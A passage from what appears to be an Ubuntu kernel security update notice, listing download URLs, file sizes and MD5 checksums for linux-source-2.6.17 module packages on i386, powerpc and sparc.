http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb Size/MD5: 81770 29bfefabc36a16493a6c928e5c58da38 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ntfs-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb Size/MD5: 55084 a6c3b4f079a095432b01a305cbae1396 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ntfs-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb Size/MD5: 56718 03f87fee426b9cc7fc35dc697ac325ef http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/parport-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb Size/MD5: 34482 65bf40cdcfc50d3832c0ff11718f5396 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/parport-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb Size/MD5: 35408 d04fc0238dcd62de3fb9e0b696984f21 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb Size/MD5: 85872 2e70dabbc267da94fd563983d00e5107 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb Size/MD5: 87422 6eab637529e91e42132421a2623ca118 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb Size/MD5: 6082 4b7dd3a6d7a23d2ac89d8474f92a6539 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb Size/MD5: 6094 203d5f595becc3bb0d957dd549adb75f http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb Size/MD5: 8606 76c97fd3e2a3cb7de66fa2c1f5e398c5 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb Size/MD5: 8896 0cdf1a91eb6071ea5995d851aecb81b0 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb Size/MD5: 52688 ba24acfaeb327bf001d504acc7d5b75f http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb Size/MD5: 55122 a6884e5f912d6465674ce54c432bef12 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb Size/MD5: 129974 5daf3e9a11ac11bc33ebfb8995c0c5a3 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb Size/MD5: 132968 50c95f3dcf8d14b56fdb82306d94b7c8 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb Size/MD5: 99866 102ff3cf54930b07dced990e7c30a70b http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb Size/MD5: 101180 8f60dad4cecf4e8e0f0bf30d2162ffc1 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb Size/MD5: 79570 14fc6f678413e604b19cd3a33822b5a1 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb Size/MD5: 80934 7284906fa24651580cb843cee6257cfb http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb Size/MD5: 1394988 43c6a6fd2292cf49d985dc7b5084e19e http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb Size/MD5: 1398074 23664d8e6a692cd769334ccb78fb7410 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb Size/MD5: 69148 867580f768fe09e83f12202b7f7e597c http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb Size/MD5: 71084 eb40bc9dcbf86451aa20c2db96d34f01 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb Size/MD5: 11424 6b8b68d6a549d95ab38c3188ed8e6fc1 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb Size/MD5: 11978 9554a7b0b1f5dfdb947c3344bf25e854 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb Size/MD5: 62476 ab5f24aab938d7761c8d8f5442b63f5b http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb Size/MD5: 63810 d4cbcad8cbc7229d93ea2e7d48d39281 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb Size/MD5: 36010 94aa7cefcd3dd08d4a0f978267922dd4 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb Size/MD5: 36522 a72b7b1633c362baf4d0c6083675319e http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb Size/MD5: 127286 a868972d2e67d6ec03b8412fe7dd28ac http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb Size/MD5: 131320 f749aa5ebbee0a4abdd9c96cb603ede2 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb Size/MD5: 46806 0a9099db77a10a02a3ec302e7775e0f4 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb Size/MD5: 47566 1ac5455bfc93bd8a7092b1b996df28af http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb Size/MD5: 311918 e7142f360d3687c441d7b3a0d69d25ac http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb Size/MD5: 318714 5585932fd8af675a5642ce57cb333c82 http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.17/linux-image-kdump_2.6.17.1-12.43_i386.deb Size/MD5: 21484142 e549bbd000f802f1ce6f85fbbc8da78d powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/affs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 23238 53fc0644ab2667ebaa63e6555cf5bcd5 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/affs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 26080 61de9f3880cadbed25a77da65a1381b4 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 48582 20001c8ee3ba761cda24e78a328c7f51 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 52026 d2de59960c36717e17eff322c41b6cfc http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 2324 6e6aace6fc6ec134c47e66be6e3b8910 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 2518 b7403b5104c85010417cefe0bb961eba http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 39146 eb90a49a38b103a0c3925757005d140a http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 43166 4bce12f747cc8597cba308382fa5734c http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 111460 e5df7aed7a368842aa08c48eb318d0d5 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 122268 95bcbec23c1ac6925c17c63d8d7ff2f1 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 40400 5ca5efe90ffda02d3a2f368ac5926e07 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 46882 1daf80a83b475fc47e107ea19c2f1c29 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 28056 602a8c20ee55224f5e824a94ad516c91 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 29048 74bbf1906200f8168c4c10ab3c0a91b4 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 209726 37949b1bd644df91cb559c5e7c05dfa5 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 225678 04e5b59a597dfd8a936511d81d176cc5 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 44594 8a341d88e62f15b0e997e55a523a6001 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 40184 23761fd6eb86b0c5a006995cbe8c7441 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fs-common-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 1960 a81261f05b4413cb805c5cc98dac3e3a http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fs-common-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 2232 720abc04eff79cd85153bb8c8df838c7 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/hfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 79290 9f60ae5f87473c3947ea6d2d0de89be0 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/hfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 86610 033ad75e83281556635eb12f445cf403 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 110264 f0cc25236eeced2feae2e38e09b1681a http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 127796 7848b94f46c94863ce29e08fa4ee9a5f http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 55674 88210cc4fef84f6898a9034e616038f4 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 61920 4b53ad32944d8ca53b99688e7d763931 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 141120 b4253369f9feda2fc952711ac5fb9a99 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 158556 7eb554805126a1b4740d763990af12be http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 314554 e620f4f0bb79ff6ab0535acfeac6452e http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 289944 a8b65ff9e8a4f726faf2f6d14dfe33e1 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 113206 35c13327d1ea4bdb2e169a8db1315559 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 116440 7adc05cc43e1cd300961f7f5ff52144c http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 2052404 264e9cb55abd564b2abe629cfebb5d39 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 2771994 df310966d1574da2e33db73462be6b11 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-powerpc-smp_2.6.17.1-12.43_powerpc.deb Size/MD5: 914794 46708abca31659f634cd987abe4daec4 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-powerpc64-smp_2.6.17.1-12.43_powerpc.deb Size/MD5: 921198 729dc495336aa978b082a1ca4962503d http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-powerpc_2.6.17.1-12.43_powerpc.deb Size/MD5: 913678 99cd38c5af261b0eb4dd11b402235d42 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12_2.6.17.1-12.43_powerpc.deb Size/MD5: 7446498 e84f6638a57eddd3d307294456d9f772 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-powerpc-smp_2.6.17.1-12.43_powerpc.deb Size/MD5: 22661310 05741c12775bbefffb071dd827ad538c http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-powerpc64-smp_2.6.17.1-12.43_powerpc.deb Size/MD5: 24547942 a2ef72e91f53b6eb48d19adc6fd9a547 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-powerpc_2.6.17.1-12.43_powerpc.deb Size/MD5: 22374876 1dda818de16c588392f35758bfbb2c2f http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-powerpc-smp_2.6.17.1-12.43_powerpc.deb Size/MD5: 2043762 6b4acfa8df86c7c7bb0571256263e9c1 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-powerpc64-smp_2.6.17.1-12.43_powerpc.deb Size/MD5: 2590694 9fc0fe11c23987e62b85d020c2cb3b1d http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-powerpc_2.6.17.1-12.43_powerpc.deb Size/MD5: 1970160 a042a3b2fbb7addcd24cf8523909f94c http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-12.43_powerpc.deb Size/MD5: 1730666 ef87744057ec4e152500a402f032b4fd http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 17432 8e1670ff2799ee52c41e8a2b30980fd6 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 17360 30ff65ef2675b3fbaef752960c41c05a http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 258074 6a1e8015578acf90231d5fb227e04a3a http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 297924 2db07e22e507226b483074f6d671e449 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 239034 1723ea1aa2ace718085b2668d6cde21c http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 266526 0f741ed7f029223f17b8200002e30072 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 1048454 1f16af9a1e471b4192dd9eea120381d0 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 1048608 48dd6d4c800e1c72fa4b41436573147f http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 2098438 06fad977e90befb9d53d0d94c015a601 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 2331936 950fce471c80ab9b5090d864b3009a34 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 233852 903f12e48fc5fc52514259609d4b4273 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 214706 64fc235662b4e3a9737617940b685ad6 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 12694 9937461669ac75116fa1e86fd9071d23 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 13314 d4a5296356835a8bb13c923d37f13835 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 83232 ab2fff0877182b5dcff4f2398b7fa745 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 97172 0872f1074ad34b2d6ed1b8a096d0ba5b http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 71168 0a7cd564f28048ebddb4a6d5aff40dd6 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 84204 502d3a406df9a941fec737e64f21bf6a http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 6346 4278171c37022964d8c3fd1a9e9062e8 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 6882 ada53c4f661823d1aa15d3da5d7381f1 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 57006 cc9ef5d6774ab1bcdeeeef3e6b604b79 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 69212 978fcee1780d896d808af0f33c2b1e62 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 128616 2c650682c75e04eada9b408a1bed6933 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 156244 3f5021cf6f2691fcb6cc7a69b5eff0c3 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 109760 8d1ddc5ab13c23ae60f7325d371a5b5c http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 133032 3b7ebc26e4b8d2148f42ada445756aca http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 86614 6b12c54f143d943ab728cca2966c9900 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 94818 3fe1ddae09d238a0de8917af39c469c5 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 1511562 53c6f5e7d9330476a33c6a7ccbc7e547 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 1521646 4aed4934db6bab23e58acefb717516a2 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 101304 8a843520dda399460efdbdd6a6b3e985 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 115564 b3828f218cb3aeb0b7901efb2ae719db http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 12202 3a395dbccce9671e7f74f9b96e59f8a7 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 14292 cf01622eb1b2c4444468a5e39bcdf92b http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 84666 e37f71ffa64e4ab1a23af78612190967 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 87956 b0bc26f0a72112f40bb8f084f3a189ba http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 37282 e0be93f6cb6d0945185744e9abbf7ab3 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 40256 f16ccfb45a78740d94eeba781ea778f9 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 139998 35d7677a130157b90ad531f063ce0a74 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 161498 62e379a3c96720961c61c70dd913d654 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 49992 caad91cfee412936d41e4cf632f5656c http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 54872 ae0ef06a66930aef4baf6699be4c1a04 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 308222 f5fa9eebbfa4bff4bc75ceb2e8ca69a5 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb Size/MD5: 330222 a70f3f022a41ea1bcb98b3875e19a6f7 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb Size/MD5: 50720 b04a0fb272052082cccbdefb339ce9c3 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb Size/MD5: 2392 bc4e7685bd3657d50af32d35fb28d3fb http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb Size/MD5: 40662 2e6fca0c5710ced2b99661c008b24bef http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb Size/MD5: 112216 6ffad38fb5b7ddb6d767e55428d145a5 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb Size/MD5: 41750 1e5fae2a75c852ad96e82724430bb5f9 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb Size/MD5: 105090 13ac4337ef87bb2ab0be001a11c89001 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb Size/MD5: 6860 f37a9430bff9e80fa48555d4cedc1c19 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb Size/MD5: 147574 ceebaefe104f9392ae4b4314c5b01f64 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb Size/MD5: 1840728 a2cb57616d185499e0ef7250f1a5c7a9 